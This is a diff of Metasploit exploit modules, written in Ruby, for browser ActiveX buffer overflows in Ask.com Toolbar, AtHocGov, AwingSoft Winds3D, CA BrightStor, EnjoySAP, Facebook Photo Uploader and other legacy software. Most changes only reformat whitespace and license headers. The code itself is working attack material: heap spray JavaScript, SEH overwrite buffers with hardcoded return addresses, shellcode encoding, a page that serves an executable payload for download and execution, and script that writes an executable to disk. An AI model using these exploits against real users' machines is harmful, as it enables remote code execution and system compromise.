spray_to = sprintf("0x%.8x", target.ret) spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) ) spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) ) @@ -100,15 +97,15 @@ class Metasploit3 < Msf::Exploit::Remote return %Q| - One second please... " content << <<-ENDEMBED - - @@ -140,10 +138,10 @@ class Metasploit3 < Msf::Exploit::Remote content << "" end - send_response(client, content, { 'Content-Type' => "text/html" }) - + send_response(client, content, { 'Content-Type' => "text/html" }) + # Handle the payload - handler(client) + handler(client) end def build_qtl(overflow) @@ -155,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote content << "moviename=\"#{cruft}\" \n" content << "qtnext=\"#{cruft}\" \n" content << "type=\"video/quicktime\" \n" - content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n" + content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n" end end diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index bd5cc0f58a..39416ac6dd 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -23,13 +23,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Ask.com Toolbar 4.0.2.53. - An attacker may be able to excute arbitrary code by sending an overly - long string to the "ShortFormat()" method in askbar.dll. + An attacker may be able to excute arbitrary code by sending an overly + long string to the "ShortFormat()" method in askbar.dll. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-5107' ], [ 'OSVDB', '37735' ], @@ -70,28 +70,27 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - - # Set the exploit buffer + + # Set the exploit buffer filler = rand_text_alpha(target['Offset']) seh = generate_seh_payload(target.ret) - sploit = filler + seh + rand_text_alpha(payload.encoded.length) - + sploit = filler + seh + rand_text_alpha(payload.encoded.length) + # Build out the message - content = %Q| - - - - - | - + content = %Q| + + + +| + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 91a07e5153..0d56784a3b 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/projects/Framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## require 'msf/core' @@ -18,13 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack overflow in AtHocGov IWSAlerts. When sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll - (6.1.4.36) an attacker may be able to execute arbitrary code. This + (6.1.4.36) an attacker may be able to execute arbitrary code. This vulnerability was silently patched by the vendor. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'URL', 'http://www.athoc.com/products/IWSAlerts_overview.aspx' ], [ 'URL', 'http://www.metasploit.com/' ], @@ -41,15 +45,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] ], 'DisclosureDate' => 'Feb 15 2008', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) - ], self.class) + register_options( + [ + OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) + ], self.class) end def autofilter @@ -66,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2) js = %Q| @@ -88,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote opts = { 'Strings' => true, 'Symbols' => { - 'Variables' => [ + 'Variables' => [ 'vulnerable', 'shellcode', 'my_unescape', @@ -108,13 +112,13 @@ class Metasploit3 < Msf::Exploit::Remote // - | + | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end @@ -122,8 +126,8 @@ class Metasploit3 < Msf::Exploit::Remote end =begin IDL info... - [id(0x00000022)] - HRESULT CompleteInstallation([in] BSTR strParam); + [id(0x00000022)] + HRESULT CompleteInstallation([in] BSTR strParam); $~/trunk/./msfpescan -f AtHocGovTBr.dll AtHocGovTBr.dll: Microsoft Visual C++ v7.1 EXE [165] diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index 6840dd020a..31648ba79b 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote free condition using the Src, Background, PackageXml properties. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ 'Elazar Broad ', # Original exploit [see References] 'Trancer ' # Metasploit implementation @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize the javascript variable names idrop = rand_text_alpha(rand(100) + 1) j_function = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 2c515169c4..3264b00428 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -39,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'AwingSoft Winds3D Player SceneURL Buffer Overflow', 'Description' => %q{ This module exploits a data segment buffer overflow within Winds3D Viewer of - AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of + AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. - By setting an overly long value to the 'SceneURL' property, an attacker can + By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code. }, 'License' => MSF_LICENSE, @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1024, - 'BadChars' => "\x00\x09\x0a\x0d'\\", + 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500 }, 'Platform' => 'win', @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote blocksize = 0x40000 fillto = 500 offset = target['Offset'] - + # Randomize the javascript variable names winds3d = rand_text_alpha(rand(100) + 1) j_shellcode = rand_text_alpha(rand(100) + 1) @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote j_block = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) - + # we must leave the page, so we use http-equiv and javascript refresh methods html = %Q| @@ -125,12 +125,10 @@ while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_b for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode}; var #{j_ret} = unescape('#{ret}'); -while (#{j_ret}.length <= #{offset}) { - #{j_ret} = #{j_ret} + unescape('#{ret}'); -} +while (#{j_ret}.length <= #{offset}) { #{j_ret} = #{j_ret} + unescape('#{ret}'); } #{winds3d}.SceneURL = #{j_ret}; setTimeout('window.location = "#{get_resource}";', 500); - + | diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb index e54af6b6b9..135432435b 100644 --- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb +++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb @@ -15,15 +15,15 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML - + def initialize(info = {}) super(update_info(info, 'Name' => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute', 'Description' => %q{ This module exploits an untrusted program execution vulnerability within the Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for - IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' - parameter to the URL to an executable, an attacker can execute arbitrary + IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' + parameter to the URL to an executable, an attacker can execute arbitrary code. Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + payload_url = "http://" payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload" @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Msf::Util::EXE.to_win32pe(framework,p.encoded) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) - + # Handle the payload # handler(cli) return @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote # otherwise, send the html.. html = %Q| - - - + + + | - + print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...") # Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index d23380b92e..bd6bbb838c 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -86,15 +86,15 @@ class Metasploit3 < Msf::Exploit::Remote # Generate the final javascript js = %Q| try { - var vulnerable = new ActiveXObject('#{progid}'); - var my_unescape = unescape; - var shellcode = '#{shellcode}'; - #{js_heap_spray} - sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000); - var evil_string = ''; - while (evil_string.length < 4150) - evil_string += my_unescape('#{spray_str}'); - vulnerable.OnBeforeVideoDownload(evil_string); +var vulnerable = new ActiveXObject('#{progid}'); +var my_unescape = unescape; +var shellcode = '#{shellcode}'; +#{js_heap_spray} +sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000); +var evil_string = ''; +while (evil_string.length < 4150) +evil_string += my_unescape('#{spray_str}'); +vulnerable.OnBeforeVideoDownload(evil_string); } catch( e ) { window.location = 'about:blank' ; } | diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index f959394a97..7f0dc5a90d 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Trancek ', 'patrick' ], + 'Author' => [ 'Trancek ', 'patrick' ], 'Version' => '$Revision$', 'References' => [ @@ -71,14 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote buff = Rex::Text.rand_text_alphanumeric(656) + [target['Ret']].pack('V') + make_nops(20) + payload.encoded # Build out the message - content = %Q| - - - - - | + content = %Q| + + + +| print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index f41c672cf6..1424ac21d1 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' @@ -16,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow', 'Description' => %q{ - The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based - buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker - could overflow a buffer and execute arbitrary code on the system. + The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based + buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker + could overflow a buffer and execute arbitrary code on the system. }, 'License' => MSF_LICENSE, - 'Author' => [ 'dean ' ], + 'Author' => [ 'dean ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-1472' ], [ 'OSVDB', '43214' ], @@ -40,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP2-SP3 IE 6.0/7.0', { 'Ret' => 0x0A0A0A0A } ] + [ 'Windows XP SP2-SP3 IE 6.0/7.0', { 'Ret' => 0x0A0A0A0A } ] ], 'DisclosureDate' => 'March 16 2008', 'DefaultTarget' => 0)) @@ -77,26 +81,26 @@ class Metasploit3 < Msf::Exploit::Remote rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) - + content = %Q| @@ -108,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index 420cb8a6f2..0516c79ee8 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -93,17 +93,17 @@ compatUI.RunApplication 1, "#{exe_path}", 1 js = %Q| function #{fnname}() { - var my_unescape = unescape; - var obj = new ActiveXObject("ChilkatCrypt2.ChilkatCrypt2"); - var exe_path = "#{exe_path}"; - var exe_str = "#{exe_str}"; - var exe_data = my_unescape(exe_str); - obj.WriteFile(exe_path, exe_data); - var hcp_str = "#{hcp_str}"; - var hcp_data = my_unescape(hcp_str); - var hcp_path = "#{hcp_path}"; - obj.WriteFile(hcp_path, hcp_data); - window.location = "#{hcp_url}"; +var my_unescape = unescape; +var obj = new ActiveXObject("ChilkatCrypt2.ChilkatCrypt2"); +var exe_path = "#{exe_path}"; +var exe_str = "#{exe_str}"; +var exe_data = my_unescape(exe_str); +obj.WriteFile(exe_path, exe_data); +var hcp_str = "#{hcp_str}"; +var hcp_data = my_unescape(hcp_str); +var hcp_path = "#{hcp_path}"; +obj.WriteFile(hcp_path, hcp_data); +window.location = "#{hcp_url}"; } | diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 3a116167d6..eea8ae7047 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -1,18 +1,16 @@ ## -## $Id: creative_software_cachefolder.rb -### - -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Creative Software AutoUpdate Engine. When - sending an overly long string to the cachefolder() property of CTSUEng.ocx + This module exploits a stack overflow in Creative Software AutoUpdate Engine. When + sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC', ], + 'Author' => [ 'MC', ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-0955' ], [ 'OSVDB', '45655' ], @@ -46,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] ], 'DisclosureDate' => 'May 28 2008', 'DefaultTarget' => 0)) @@ -80,34 +78,34 @@ class Metasploit3 < Msf::Exploit::Remote rand8 = rand_text_alpha(rand(100) + 1) content = %Q| - - - - - | + + + + + | # Randomize the whitespace in the document content = Rex::Text.randomize_space(content) - + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index fe043cfa0c..fb65ef4faf 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb @@ -24,13 +24,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a command execution vulnerability within the DX Studio Player from Worldweaver. The player is a browser plugin for - IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web + IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow - the plug-in to access local files. This prompt appears to occur only once per + the plug-in to access local files. This prompt appears to occur only once per server host. NOTE: This exploit uses additionally dangerous script features to write to @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote cmds = generate_cmdstager({}, 2047, p) scr = "" cmds.each { |ln| - scr << " f.writeString('" + scr << "f.writeString('" scr << ln scr << "\\n');\n" } @@ -89,11 +89,11 @@ class Metasploit3 < Msf::Exploit::Remote @@ -109,7 +109,7 @@ CMDS print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) - + # Handle the payload # handler(cli) return @@ -122,9 +122,9 @@ CMDS Please wait... - - - + + + @@ -140,6 +140,6 @@ end =begin TODO: - - make it more quiet - - auto-migrate? +- make it more quiet +- auto-migrate? =end diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index ae5b60b576..e66d877570 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/projects/Framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## require 'msf/core' @@ -17,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Electronic Arts SnoopyCtrl - ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long - string to the CheckRequirements() method, an attacker may be able - to execute arbitrary code. + ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long + string to the CheckRequirements() method, an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-4466' ], ], @@ -40,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] ], 'DisclosureDate' => 'Oct 8 2007', 'DefaultTarget' => 0)) @@ -60,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or al, 12").encode_string * 2) js = %Q| @@ -82,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote opts = { 'Strings' => true, 'Symbols' => { - 'Variables' => [ + 'Variables' => [ 'vulnerable', 'shellcode', 'my_unescape', @@ -94,21 +98,20 @@ class Metasploit3 < Msf::Exploit::Remote js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) js.update_opts(js_heap_spray.opts) js.obfuscate() - content = %Q| - - - - - - | + content = %Q| + + + + +| print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index fa186a3999..440dbbf6be 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -20,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0. - The vulnerability is caused due to a boundary error in the + This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0. + The vulnerability is caused due to a boundary error in the FViewerLoading (FlipViewerX.dll) ActiveX control when handling the "LoadOpf()" method. }, 'License' => BSD_LICENSE, - 'Author' => [ 'LSO ' ], + 'Author' => [ 'LSO ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-2919' ], [ 'OSVDB', '37042' ], @@ -65,42 +65,41 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(cli)) == nil) shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + nops = Rex::Text.to_unescape(make_nops(4)) ret = Rex::Text.uri_encode([target.ret].pack('L')) - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) - - content = %Q| - - - - - | + vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) + + content = %Q| + + + +| content = Rex::Text.randomize_space(content) diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index ab108b560d..f479957539 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'EnjoySAP SAP GUI ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in SAP KWEdit ActiveX + This module exploits a stack overflow in SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending - an overly long string to the "PrepareToPostHTML()" method, an attacker + an overly long string to the "PrepareToPostHTML()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-3605' ], [ 'OSVDB', '37690' ], @@ -49,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], - [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], + [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], ], 'DisclosureDate' => 'July 05 2007', @@ -71,27 +70,26 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - + # Build the exploit buffer - sploit = rand_text_alpha(1036) + Rex::Arch::X86.jmp_short(6) - sploit << make_nops(2) + [target.ret].pack('V') + p.encoded + sploit = rand_text_alpha(1036) + Rex::Arch::X86.jmp_short(6) + sploit << make_nops(2) + [target.ret].pack('V') + p.encoded # Build out the message - content = %Q| - - - - - | - + content = %Q| + + + +| + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index 13071f07e3..6588e2a187 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Facebook Photo Uploader 4 ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Facebook Photo Uploader 4. - By sending an overly long string to the "ExtractIptc()" property located - in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute - arbitrary code. + This module exploits a stack overflow in Facebook Photo Uploader 4. + By sending an overly long string to the "ExtractIptc()" property located + in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute + arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-5711' ], [ 'OSVDB', '41073' ], @@ -49,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English', { 'Ret' => 0x74c9de3e } ], # 02/07/08 + [ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English', { 'Ret' => 0x74c9de3e } ], # 02/07/08 ], # ./msfpescan -i /tmp/oleacc.dll | grep SEHandler 'DisclosureDate' => 'Jan 31 2008', 'DefaultTarget' => 0)) @@ -74,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote rand2 = rand_text_alpha(rand(100) + 1) rand3 = rand_text_alpha(rand(100) + 1) rand4 = rand_text_alpha(rand(100) + 1) - + # Set the exploit buffer filler = Rex::Text.to_unescape(rand_text_alpha(2)) jmp = Rex::Text.to_unescape([0x969606eb].pack('V')) @@ -82,26 +81,25 @@ class Metasploit3 < Msf::Exploit::Remote sc = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Build out the message - content = %Q| - - - - - | - + content = %Q| + + + +| + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/gom_openurl.rb 